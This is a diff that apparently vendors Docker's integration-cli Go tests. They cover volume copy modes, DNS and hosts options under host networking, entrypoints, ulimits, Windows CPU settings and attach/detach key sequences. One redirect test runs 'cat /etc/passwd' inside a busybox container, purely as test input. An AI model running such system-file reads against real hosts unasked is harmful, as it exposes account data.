+	out, _ = dockerCmd(c, "run", "-v", "test:/foo", "volumecopy")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "hello")
+
+	// do not allow copy modes on volumes-from
+	dockerCmd(c, "run", "--name=test", "-v", "/foo", "busybox", "true")
+	out, _, err = dockerCmdWithError("run", "--volumes-from=test:copy", "busybox", "true")
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	out, _, err = dockerCmdWithError("run", "--volumes-from=test:nocopy", "busybox", "true")
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+
+	// do not allow copy modes on binds
+	out, _, err = dockerCmdWithError("run", "-v", "/foo:/bar:copy", "busybox", "true")
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	out, _, err = dockerCmdWithError("run", "-v", "/foo:/bar:nocopy", "busybox", "true")
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+}
+
+// Test case for #21976
+func (s *DockerSuite) TestRunDNSInHostMode(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+
+	expectedOutput := "nameserver 127.0.0.1"
+	expectedWarning := "Localhost DNS setting"
+	out, stderr, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--net=host", "busybox", "cat", "/etc/resolv.conf")
+	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
+	c.Assert(stderr, checker.Contains, expectedWarning, check.Commentf("Expected warning on stderr about localhost resolver, but got %q", stderr))
+
+	expectedOutput = "nameserver 1.2.3.4"
+	out, _ = dockerCmd(c, "run", "--dns=1.2.3.4", "--net=host", "busybox", "cat", "/etc/resolv.conf")
+	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
+
+	expectedOutput = "search example.com"
+	out, _ = dockerCmd(c, "run", "--dns-search=example.com", "--net=host", "busybox", "cat", "/etc/resolv.conf")
+	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
+
+	expectedOutput = "options timeout:3"
+	out, _ = dockerCmd(c, "run", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf")
+	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
+
+	expectedOutput1 := "nameserver 1.2.3.4"
+	expectedOutput2 := "search example.com"
+	expectedOutput3 := "options timeout:3"
+	out, _ = dockerCmd(c, "run", "--dns=1.2.3.4", "--dns-search=example.com", "--dns-opt=timeout:3", "--net=host", "busybox", "cat", "/etc/resolv.conf")
+	c.Assert(out, checker.Contains, expectedOutput1, check.Commentf("Expected '%s', but got %q", expectedOutput1, out))
+	c.Assert(out, checker.Contains, expectedOutput2, check.Commentf("Expected '%s', but got %q", expectedOutput2, out))
+	c.Assert(out, checker.Contains, expectedOutput3, check.Commentf("Expected '%s', but got %q", expectedOutput3, out))
+}
+
+// Test case for #21976
+func (s *DockerSuite) TestRunAddHostInHostMode(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+
+	expectedOutput := "1.2.3.4\textra"
+	out, _ := dockerCmd(c, "run", "--add-host=extra:1.2.3.4", "--net=host", "busybox", "cat", "/etc/hosts")
+	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
+}
+
+func (s *DockerSuite) TestRunRmAndWait(c *check.C) {
+	dockerCmd(c, "run", "--name=test", "--rm", "-d", "busybox", "sh", "-c", "sleep 3;exit 2")
+
+	out, code, err := dockerCmdWithError("wait", "test")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %s; exit code: %d", out, code))
+	c.Assert(out, checker.Equals, "2\n", check.Commentf("exit code: %d", code))
+	c.Assert(code, checker.Equals, 0)
+}
+
+// Test case for #23498
+func (s *DockerSuite) TestRunUnsetEntrypoint(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "test-entrypoint"
+	dockerfile := `FROM busybox
+ADD entrypoint.sh /entrypoint.sh
+RUN chmod 755 /entrypoint.sh
+ENTRYPOINT ["/entrypoint.sh"]
+CMD echo foobar`
+
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"entrypoint.sh": `#!/bin/sh
+echo "I am an entrypoint"
+exec "$@"`,
+	})
+	c.Assert(err, check.IsNil)
+	defer ctx.Close()
+
+	_, err = buildImageFromContext(name, ctx, true)
+	c.Assert(err, check.IsNil)
+
+	out, _ := dockerCmd(c, "run", "--entrypoint=", "-t", name, "echo", "foo")
+	c.Assert(strings.TrimSpace(out), check.Equals, "foo")
+
+	// CMD will be reset as well (the same as setting a custom entrypoint)
+	_, _, err = dockerCmdWithError("run", "--entrypoint=", "-t", name)
+	c.Assert(err, check.NotNil)
+	c.Assert(err.Error(), checker.Contains, "No command specified")
+}
+
+func (s *DockerDaemonSuite) TestRunWithUlimitAndDaemonDefault(c *check.C) {
+	c.Assert(s.d.StartWithBusybox("--debug", "--default-ulimit=nofile=65535"), checker.IsNil)
+
+	name := "test-A"
+	_, err := s.d.Cmd("run", "--name", name, "-d", "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	c.Assert(s.d.waitRun(name), check.IsNil)
+
+	out, err := s.d.Cmd("inspect", "--format", "{{.HostConfig.Ulimits}}", name)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "[nofile=65535:65535]")
+
+	name = "test-B"
+	_, err = s.d.Cmd("run", "--name", name, "--ulimit=nofile=42", "-d", "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	c.Assert(s.d.waitRun(name), check.IsNil)
+
+	out, err = s.d.Cmd("inspect", "--format", "{{.HostConfig.Ulimits}}", name)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "[nofile=42:42]")
+}
+
+func (s *DockerSuite) TestRunStoppedLoggingDriverNoLeak(c *check.C) {
+	nroutines, err := getGoroutineNumber()
+	c.Assert(err, checker.IsNil)
+
+	out, _, err := dockerCmdWithError("run", "--name=fail", "--log-driver=splunk", "busybox", "true")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "Failed to initialize logging driver", check.Commentf("error should be about logging driver, got output %s", out))
+
+	// NGoroutines is not updated right away, so we need to wait before failing
+	c.Assert(waitForGoroutines(nroutines), checker.IsNil)
+}
+
+// Handles error conditions for --credentialspec. Validating E2E success cases
+// requires additional infrastructure (AD for example) on CI servers.
+func (s *DockerSuite) TestRunCredentialSpecFailures(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	attempts := []struct{ value, expectedError string }{
+		{"rubbish", "invalid credential spec security option - value must be prefixed file:// or registry://"},
+		{"rubbish://", "invalid credential spec security option - value must be prefixed file:// or registry://"},
+		{"file://", "no value supplied for file:// credential spec security option"},
+		{"registry://", "no value supplied for registry:// credential spec security option"},
+		{`file://c:\blah.txt`, "path cannot be absolute"},
+		{`file://doesnotexist.txt`, "The system cannot find the file specified"},
+	}
+	for _, attempt := range attempts {
+		_, _, err := dockerCmdWithError("run", "--security-opt=credentialspec="+attempt.value, "busybox", "true")
+		c.Assert(err, checker.NotNil, check.Commentf("%s expected non-nil err", attempt.value))
+		c.Assert(err.Error(), checker.Contains, attempt.expectedError, check.Commentf("%s expected %s got %s", attempt.value, attempt.expectedError, err))
+	}
+}
+
+// Windows specific test to validate credential specs with a well-formed spec.
+// Note it won't actually do anything in CI configuration with the spec, but
+// it should not fail to run a container.
+func (s *DockerSuite) TestRunCredentialSpecWellFormed(c *check.C) {
+	testRequires(c, DaemonIsWindows, SameHostDaemon)
+	validCS := readFile(`fixtures\credentialspecs\valid.json`, c)
+	writeFile(filepath.Join(dockerBasePath, `credentialspecs\valid.json`), validCS, c)
+	dockerCmd(c, "run", `--security-opt=credentialspec=file://valid.json`, "busybox", "true")
+}
+
+// Windows specific test to ensure that a servicing app container is started
+// if necessary once a container exits. It does this by forcing a no-op
+// servicing event and verifying the event from Hyper-V-Compute
+func (s *DockerSuite) TestRunServicingContainer(c *check.C) {
+	testRequires(c, DaemonIsWindows, SameHostDaemon)
+
+	out, _ := dockerCmd(c, "run", "-d", WindowsBaseImage, "cmd", "/c", "mkdir c:\\programdata\\Microsoft\\Windows\\ContainerUpdates\\000_000_d99f45d0-ffc8-4af7-bd9c-ea6a62e035c9_200 && sc control cexecsvc 255")
+	containerID := strings.TrimSpace(out)
+	err := waitExited(containerID, 60*time.Second)
+	c.Assert(err, checker.IsNil)
+
+	cmd := exec.Command("powershell", "echo", `(Get-WinEvent -ProviderName "Microsoft-Windows-Hyper-V-Compute" -FilterXPath 'Event[System[EventID=2010]]' -MaxEvents 1).Message`)
+	out2, _, err := runCommandWithOutput(cmd)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out2, checker.Contains, `"Servicing":true`, check.Commentf("Servicing container does not appear to have been started: %s", out2))
+	c.Assert(out2, checker.Contains, `Windows Container (Servicing)`, check.Commentf("Didn't find 'Windows Container (Servicing): %s", out2))
+	c.Assert(out2, checker.Contains, containerID+"_servicing", check.Commentf("Didn't find '%s_servicing': %s", containerID+"_servicing", out2))
+}
+
+func (s *DockerSuite) TestRunDuplicateMount(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace)
+
+	tmpFile, err := ioutil.TempFile("", "touch-me")
+	c.Assert(err, checker.IsNil)
+	defer tmpFile.Close()
+
+	data := "touch-me-foo-bar\n"
+	if _, err := tmpFile.Write([]byte(data)); err != nil {
+		c.Fatal(err)
+	}
+
+	name := "test"
+	out, _ := dockerCmd(c, "run", "--name", name, "-v", "/tmp:/tmp", "-v", "/tmp:/tmp", "busybox", "sh", "-c", "cat "+tmpFile.Name()+" && ls /")
+	c.Assert(out, checker.Not(checker.Contains), "tmp:")
+	c.Assert(out, checker.Contains, data)
+
+	out = inspectFieldJSON(c, name, "Config.Volumes")
+	c.Assert(out, checker.Contains, "null")
+}
+
+func (s *DockerSuite) TestRunWindowsWithCPUCount(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+
+	out, _ := dockerCmd(c, "run", "--cpu-count=1", "--name", "test", "busybox", "echo", "testing")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "testing")
+
+	out = inspectField(c, "test", "HostConfig.CPUCount")
+	c.Assert(out, check.Equals, "1")
+}
+
+func (s *DockerSuite) TestRunWindowsWithCPUShares(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+
+	out, _ := dockerCmd(c, "run", "--cpu-shares=1000", "--name", "test", "busybox", "echo", "testing")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "testing")
+
+	out = inspectField(c, "test", "HostConfig.CPUShares")
+	c.Assert(out, check.Equals, "1000")
+}
+
+func (s *DockerSuite) TestRunWindowsWithCPUPercent(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+
+	out, _ := dockerCmd(c, "run", "--cpu-percent=80", "--name", "test", "busybox", "echo", "testing")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "testing")
+
+	out = inspectField(c, "test", "HostConfig.CPUPercent")
+	c.Assert(out, check.Equals, "80")
+}
+
+func (s *DockerSuite) TestRunProcessIsolationWithCPUCountCPUSharesAndCPUPercent(c *check.C) {
+	testRequires(c, DaemonIsWindows, IsolationIsProcess)
+
+	out, _ := dockerCmd(c, "run", "--cpu-count=1", "--cpu-shares=1000", "--cpu-percent=80", "--name", "test", "busybox", "echo", "testing")
+	c.Assert(strings.TrimSpace(out), checker.Contains, "WARNING: Conflicting options: CPU count takes priority over CPU shares on Windows Server Containers. CPU shares discarded")
+	c.Assert(strings.TrimSpace(out), checker.Contains, "WARNING: Conflicting options: CPU count takes priority over CPU percent on Windows Server Containers. CPU percent discarded")
+	c.Assert(strings.TrimSpace(out), checker.Contains, "testing")
+
+	out = inspectField(c, "test", "HostConfig.CPUCount")
+	c.Assert(out, check.Equals, "1")
+
+	out = inspectField(c, "test", "HostConfig.CPUShares")
+	c.Assert(out, check.Equals, "0")
+
+	out = inspectField(c, "test", "HostConfig.CPUPercent")
+	c.Assert(out, check.Equals, "0")
+}
+
+func (s *DockerSuite) TestRunHypervIsolationWithCPUCountCPUSharesAndCPUPercent(c *check.C) {
+	testRequires(c, DaemonIsWindows, IsolationIsHyperv)
+
+	out, _ := dockerCmd(c, "run", "--cpu-count=1", "--cpu-shares=1000", "--cpu-percent=80", "--name", "test", "busybox", "echo", "testing")
+	c.Assert(strings.TrimSpace(out), checker.Contains, "testing")
+
+	out = inspectField(c, "test", "HostConfig.CPUCount")
+	c.Assert(out, check.Equals, "1")
+
+	out = inspectField(c, "test", "HostConfig.CPUShares")
+	c.Assert(out, check.Equals, "1000")
+
+	out = inspectField(c, "test", "HostConfig.CPUPercent")
+	c.Assert(out, check.Equals, "80")
+}
+
+// Test for #25099
+func (s *DockerSuite) TestRunEmptyEnv(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	expectedOutput := "invalid environment variable:"
+
+	out, _, err := dockerCmdWithError("run", "-e", "", "busybox", "true")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, expectedOutput)
+
+	out, _, err = dockerCmdWithError("run", "-e", "=", "busybox", "true")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, expectedOutput)
+
+	out, _, err = dockerCmdWithError("run", "-e", "=foo", "busybox", "true")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, expectedOutput)
+}
+
+// #28658
+func (s *DockerSuite) TestSlowStdinClosing(c *check.C) {
+	name := "testslowstdinclosing"
+	repeat := 3 // regression happened 50% of the time
+	for i := 0; i < repeat; i++ {
+		cmd := exec.Command(dockerBinary, "run", "--rm", "--name", name, "-i", "busybox", "cat")
+		cmd.Stdin = &delayedReader{}
+		done := make(chan error, 1)
+		go func() {
+			_, err := runCommand(cmd)
+			done <- err
+		}()
+
+		select {
+		case <-time.After(15 * time.Second):
+			c.Fatal("running container timed out") // cleanup in teardown
+		case err := <-done:
+			c.Assert(err, checker.IsNil)
+		}
+	}
+}
+
+type delayedReader struct{}
+
+func (s *delayedReader) Read([]byte) (int, error) {
+	time.Sleep(500 * time.Millisecond)
+	return 0, io.EOF
+}
+
+// #28823 (originally #28639)
+func (s *DockerSuite) TestRunMountReadOnlyDevShm(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+	emptyDir, err := ioutil.TempDir("", "test-read-only-dev-shm")
+	c.Assert(err, check.IsNil)
+	defer os.RemoveAll(emptyDir)
+	out, _, err := dockerCmdWithError("run", "--rm", "--read-only",
+		"-v", fmt.Sprintf("%s:/dev/shm:ro", emptyDir),
+		"busybox", "touch", "/dev/shm/foo")
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Read-only file system")
+}
+
+// Test case for 29129
+func (s *DockerSuite) TestRunHostnameInHostMode(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	expectedOutput := "foobar\nfoobar"
+	out, _ := dockerCmd(c, "run", "--net=host", "--hostname=foobar", "busybox", "sh", "-c", `echo $HOSTNAME && hostname`)
+	c.Assert(strings.TrimSpace(out), checker.Equals, expectedOutput)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go
new file mode 100644
index 0000000000..e346c19f8e
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_unix_test.go
@@ -0,0 +1,1592 @@
+// +build !windows
+
+package main
+
+import (
+	"bufio"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"regexp"
+	"strconv"
+	"strings"
+	"syscall"
+	"time"
+
+	"github.com/docker/docker/pkg/homedir"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/pkg/parsers"
+	"github.com/docker/docker/pkg/sysinfo"
+	"github.com/go-check/check"
+	"github.com/kr/pty"
+)
+
+// #6509
+func (s *DockerSuite) TestRunRedirectStdout(c *check.C) {
+	checkRedirect := func(command string) {
+		_, tty, err := pty.Open()
+		c.Assert(err, checker.IsNil, check.Commentf("Could not open pty"))
+		cmd := exec.Command("sh", "-c", command)
+		cmd.Stdin = tty
+		cmd.Stdout = tty
+		cmd.Stderr = tty
+		c.Assert(cmd.Start(), checker.IsNil)
+		ch := make(chan error)
+		go func() {
+			ch <- cmd.Wait()
+			close(ch)
+		}()
+
+		select {
+		case <-time.After(10 * time.Second):
+			c.Fatal("command timeout")
+		case err := <-ch:
+			c.Assert(err, checker.IsNil, check.Commentf("wait err"))
+		}
+	}
+
+	checkRedirect(dockerBinary + " run -i busybox cat /etc/passwd | grep -q root")
+	checkRedirect(dockerBinary + " run busybox cat /etc/passwd | grep -q root")
+}
+
+// Test recursive bind mount works by default
+func (s *DockerSuite) TestRunWithVolumesIsRecursive(c *check.C) {
+	// /tmp gets permission denied
+	testRequires(c, NotUserNamespace, SameHostDaemon)
+	tmpDir, err := ioutil.TempDir("", "docker_recursive_mount_test")
+	c.Assert(err, checker.IsNil)
+
+	defer os.RemoveAll(tmpDir)
+
+	// Create a temporary tmpfs mount.
+	tmpfsDir := filepath.Join(tmpDir, "tmpfs")
+	c.Assert(os.MkdirAll(tmpfsDir, 0777), checker.IsNil, check.Commentf("failed to mkdir at %s", tmpfsDir))
+	c.Assert(mount.Mount("tmpfs", tmpfsDir, "tmpfs", ""), checker.IsNil, check.Commentf("failed to create a tmpfs mount at %s", tmpfsDir))
+
+	f, err := ioutil.TempFile(tmpfsDir, "touch-me")
+	c.Assert(err, checker.IsNil)
+	defer f.Close()
+
+	runCmd := exec.Command(dockerBinary, "run", "--name", "test-data", "--volume", fmt.Sprintf("%s:/tmp:ro", tmpDir), "busybox:latest", "ls", "/tmp/tmpfs")
+	out, _, _, err := runCommandWithStdoutStderr(runCmd)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, filepath.Base(f.Name()), check.Commentf("Recursive bind mount test failed. Expected file not found"))
+}
+
+func (s *DockerSuite) TestRunDeviceDirectory(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm)
+	if _, err := os.Stat("/dev/snd"); err != nil {
+		c.Skip("Host does not have /dev/snd")
+	}
+
+	out, _ := dockerCmd(c, "run", "--device", "/dev/snd:/dev/snd", "busybox", "sh", "-c", "ls /dev/snd/")
+	c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "timer", check.Commentf("expected output /dev/snd/timer"))
+
+	out, _ = dockerCmd(c, "run", "--device", "/dev/snd:/dev/othersnd", "busybox", "sh", "-c", "ls /dev/othersnd/")
+	c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "seq", check.Commentf("expected output /dev/othersnd/seq"))
+}
+
+// TestRunDetach checks attaching and detaching with the default escape sequence.
+func (s *DockerSuite) TestRunAttachDetach(c *check.C) {
+	name := "attach-detach"
+
+	dockerCmd(c, "run", "--name", name, "-itd", "busybox", "cat")
+
+	cmd := exec.Command(dockerBinary, "attach", name)
+	stdout, err := cmd.StdoutPipe()
+	c.Assert(err, checker.IsNil)
+	cpty, tty, err := pty.Open()
+	c.Assert(err, checker.IsNil)
+	defer cpty.Close()
+	cmd.Stdin = tty
+	c.Assert(cmd.Start(), checker.IsNil)
+	c.Assert(waitRun(name), check.IsNil)
+
+	_, err = cpty.Write([]byte("hello\n"))
+	c.Assert(err, checker.IsNil)
+
+	out, err := bufio.NewReader(stdout).ReadString('\n')
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "hello")
+
+	// escape sequence
+	_, err = cpty.Write([]byte{16})
+	c.Assert(err, checker.IsNil)
+	time.Sleep(100 * time.Millisecond)
+	_, err = cpty.Write([]byte{17})
+	c.Assert(err, checker.IsNil)
+
+	ch := make(chan struct{})
+	go func() {
+		cmd.Wait()
+		ch <- struct{}{}
+	}()
+
+	select {
+	case <-ch:
+	case <-time.After(10 * time.Second):
+		c.Fatal("timed out waiting for container to exit")
+	}
+
+	running := inspectField(c, name, "State.Running")
+	c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running"))
+
+	out, _ = dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c), "-f", "container="+name)
+	// attach and detach event should be monitored
+	c.Assert(out, checker.Contains, "attach")
+	c.Assert(out, checker.Contains, "detach")
+}
+
+// TestRunDetach checks attaching and detaching with the escape sequence specified via flags.
+func (s *DockerSuite) TestRunAttachDetachFromFlag(c *check.C) {
+	name := "attach-detach"
+	keyCtrlA := []byte{1}
+	keyA := []byte{97}
+
+	dockerCmd(c, "run", "--name", name, "-itd", "busybox", "cat")
+
+	cmd := exec.Command(dockerBinary, "attach", "--detach-keys=ctrl-a,a", name)
+	stdout, err := cmd.StdoutPipe()
+	if err != nil {
+		c.Fatal(err)
+	}
+	cpty, tty, err := pty.Open()
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer cpty.Close()
+	cmd.Stdin = tty
+	if err := cmd.Start(); err != nil {
+		c.Fatal(err)
+	}
+	c.Assert(waitRun(name), check.IsNil)
+
+	if _, err := cpty.Write([]byte("hello\n")); err != nil {
+		c.Fatal(err)
+	}
+
+	out, err := bufio.NewReader(stdout).ReadString('\n')
+	if err != nil {
+		c.Fatal(err)
+	}
+	if strings.TrimSpace(out) != "hello" {
+		c.Fatalf("expected 'hello', got %q", out)
+	}
+
+	// escape sequence
+	if _, err := cpty.Write(keyCtrlA); err != nil {
+		c.Fatal(err)
+	}
+	time.Sleep(100 * time.Millisecond)
+	if _, err := cpty.Write(keyA); err != nil {
+		c.Fatal(err)
+	}
+
+	ch := make(chan struct{})
+	go func() {
+		cmd.Wait()
+		ch <- struct{}{}
+	}()
+
+	select {
+	case <-ch:
+	case <-time.After(10 * time.Second):
+		c.Fatal("timed out waiting for container to exit")
+	}
+
+	running := inspectField(c, name, "State.Running")
+	c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running"))
+}
+
+// TestRunDetach checks attaching and detaching with the escape sequence specified via flags.
+func (s *DockerSuite) TestRunAttachDetachFromInvalidFlag(c *check.C) {
+	name := "attach-detach"
+	dockerCmd(c, "run", "--name", name, "-itd", "busybox", "top")
+	c.Assert(waitRun(name), check.IsNil)
+
+	// specify an invalid detach key, container will ignore it and use default
+	cmd := exec.Command(dockerBinary, "attach", "--detach-keys=ctrl-A,a", name)
+	stdout, err := cmd.StdoutPipe()
+	if err != nil {
+		c.Fatal(err)
+	}
+	cpty, tty, err := pty.Open()
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer cpty.Close()
+	cmd.Stdin = tty
+	if err := cmd.Start(); err != nil {
+		c.Fatal(err)
+	}
+
+	bufReader := bufio.NewReader(stdout)
+	out, err := bufReader.ReadString('\n')
+	if err != nil {
+		c.Fatal(err)
+	}
+	// it should print a warning to indicate the detach key flag is invalid
+	errStr := "Invalid escape keys (ctrl-A,a) provided"
+	c.Assert(strings.TrimSpace(out), checker.Equals, errStr)
+}
+
+// TestRunDetach checks attaching and detaching with the escape sequence specified via config file.
+func (s *DockerSuite) TestRunAttachDetachFromConfig(c *check.C) {
+	keyCtrlA := []byte{1}
+	keyA := []byte{97}
+
+	// Setup config
+	homeKey := homedir.Key()
+	homeVal := homedir.Get()
+	tmpDir, err := ioutil.TempDir("", "fake-home")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(tmpDir)
+
+	dotDocker := filepath.Join(tmpDir, ".docker")
+	os.Mkdir(dotDocker, 0600)
+	tmpCfg := filepath.Join(dotDocker, "config.json")
+
+	defer func() { os.Setenv(homeKey, homeVal) }()
+	os.Setenv(homeKey, tmpDir)
+
+	data := `{
+		"detachKeys": "ctrl-a,a"
+	}`
+
+	err = ioutil.WriteFile(tmpCfg, []byte(data), 0600)
+	c.Assert(err, checker.IsNil)
+
+	// Then do the work
+	name := "attach-detach"
+	dockerCmd(c, "run", "--name", name, "-itd", "busybox", "cat")
+
+	cmd := exec.Command(dockerBinary, "attach", name)
+	stdout, err := cmd.StdoutPipe()
+	if err != nil {
+		c.Fatal(err)
+	}
+	cpty, tty, err := pty.Open()
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer cpty.Close()
+	cmd.Stdin = tty
+	if err := cmd.Start(); err != nil {
+		c.Fatal(err)
+	}
+	c.Assert(waitRun(name), check.IsNil)
+
+	if _, err := cpty.Write([]byte("hello\n")); err != nil {
+		c.Fatal(err)
+	}
+
+	out, err := bufio.NewReader(stdout).ReadString('\n')
+	if err != nil {
+		c.Fatal(err)
+	}
+	if strings.TrimSpace(out) != "hello" {
+		c.Fatalf("expected 'hello', got %q", out)
+	}
+
+	// escape sequence
+	if _, err := cpty.Write(keyCtrlA); err != nil {
+		c.Fatal(err)
+	}
+	time.Sleep(100 * time.Millisecond)
+	if _, err := cpty.Write(keyA); err != nil {
+		c.Fatal(err)
+	}
+
+	ch := make(chan struct{})
+	go func() {
+		cmd.Wait()
+		ch <- struct{}{}
+	}()
+
+	select {
+	case <-ch:
+	case <-time.After(10 * time.Second):
+		c.Fatal("timed out waiting for container to exit")
+	}
+
+	running := inspectField(c, name, "State.Running")
+	c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running"))
+}
+
+// TestRunDetach checks attaching and detaching with the detach flags, making sure it overrides config file
+func (s *DockerSuite) TestRunAttachDetachKeysOverrideConfig(c *check.C) {
+	keyCtrlA := []byte{1}
+	keyA := []byte{97}
+
+	// Setup config
+	homeKey := homedir.Key()
+	homeVal := homedir.Get()
+	tmpDir, err := ioutil.TempDir("", "fake-home")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(tmpDir)
+
+	dotDocker := filepath.Join(tmpDir, ".docker")
+	os.Mkdir(dotDocker, 0600)
+	tmpCfg := filepath.Join(dotDocker, "config.json")
+
+	defer func() { os.Setenv(homeKey, homeVal) }()
+	os.Setenv(homeKey, tmpDir)
+
+	data := `{
+		"detachKeys": "ctrl-e,e"
+	}`
+
+	err = ioutil.WriteFile(tmpCfg, []byte(data), 0600)
+	c.Assert(err, checker.IsNil)
+
+	// Then do the work
+	name := "attach-detach"
+	dockerCmd(c, "run", "--name", name, "-itd", "busybox", "cat")
+
+	cmd := exec.Command(dockerBinary, "attach", "--detach-keys=ctrl-a,a", name)
+	stdout, err := cmd.StdoutPipe()
+	if err != nil {
+		c.Fatal(err)
+	}
+	cpty, tty, err := pty.Open()
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer cpty.Close()
+	cmd.Stdin = tty
+	if err := cmd.Start(); err != nil {
+		c.Fatal(err)
+	}
+	c.Assert(waitRun(name), check.IsNil)
+
+	if _, err := cpty.Write([]byte("hello\n")); err != nil {
+		c.Fatal(err)
+	}
+
+	out, err := bufio.NewReader(stdout).ReadString('\n')
+	if err != nil {
+		c.Fatal(err)
+	}
+	if strings.TrimSpace(out) != "hello" {
+		c.Fatalf("expected 'hello', got %q", out)
+	}
+
+	// escape sequence
+	if _, err := cpty.Write(keyCtrlA); err != nil {
+		c.Fatal(err)
+	}
+	time.Sleep(100 * time.Millisecond)
+	if _, err := cpty.Write(keyA); err != nil {
+		c.Fatal(err)
+	}
+
+	ch := make(chan struct{})
+	go func() {
+		cmd.Wait()
+		ch <- struct{}{}
+	}()
+
+	select {
+	case <-ch:
+	case <-time.After(10 * time.Second):
+		c.Fatal("timed out waiting for container to exit")
+	}
+
+	running := inspectField(c, name, "State.Running")
+	c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running"))
+}
+
+func (s *DockerSuite) TestRunAttachInvalidDetachKeySequencePreserved(c *check.C) {
+	name := "attach-detach"
+	keyA := []byte{97}
+	keyB := []byte{98}
+
+	dockerCmd(c, "run", "--name", name, "-itd", "busybox", "cat")
+
+	cmd := exec.Command(dockerBinary, "attach", "--detach-keys=a,b,c", name)
+	stdout, err := cmd.StdoutPipe()
+	if err != nil {
+		c.Fatal(err)
+	}
+	cpty, tty, err := pty.Open()
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer cpty.Close()
+	cmd.Stdin = tty
+	if err := cmd.Start(); err != nil {
+		c.Fatal(err)
+	}
+	c.Assert(waitRun(name), check.IsNil)
+
+	// Invalid escape sequence aba, should print aba in output
+	if _, err := cpty.Write(keyA); err != nil {
+		c.Fatal(err)
+	}
+	time.Sleep(100 * time.Millisecond)
+	if _, err := cpty.Write(keyB); err != nil {
+		c.Fatal(err)
+	}
+	time.Sleep(100 * time.Millisecond)
+	if _, err := cpty.Write(keyA); err != nil {
+		c.Fatal(err)
+	}
+	time.Sleep(100 * time.Millisecond)
+	if _, err := cpty.Write([]byte("\n")); err != nil {
+		c.Fatal(err)
+	}
+
+	out, err := bufio.NewReader(stdout).ReadString('\n')
+	if err != nil {
+		c.Fatal(err)
+	}
+	if strings.TrimSpace(out) != "aba" {
+		c.Fatalf("expected 'aba', got %q", out)
+	}
+}
+
+// "test" should be printed
+func (s *DockerSuite) TestRunWithCPUQuota(c *check.C) {
+	testRequires(c, cpuCfsQuota)
+
+	file := "/sys/fs/cgroup/cpu/cpu.cfs_quota_us"
+	out, _ := dockerCmd(c, "run", "--cpu-quota", "8000", "--name", "test", "busybox", "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "8000")
+
+	out = inspectField(c, "test", "HostConfig.CpuQuota")
+	c.Assert(out, checker.Equals, "8000", check.Commentf("setting the CPU CFS quota failed"))
+}
+
+func (s *DockerSuite) TestRunWithCpuPeriod(c *check.C) {
+	testRequires(c, cpuCfsPeriod)
+
+	file := "/sys/fs/cgroup/cpu/cpu.cfs_period_us"
+	out, _ := dockerCmd(c, "run", "--cpu-period", "50000", "--name", "test", "busybox", "cat", file)
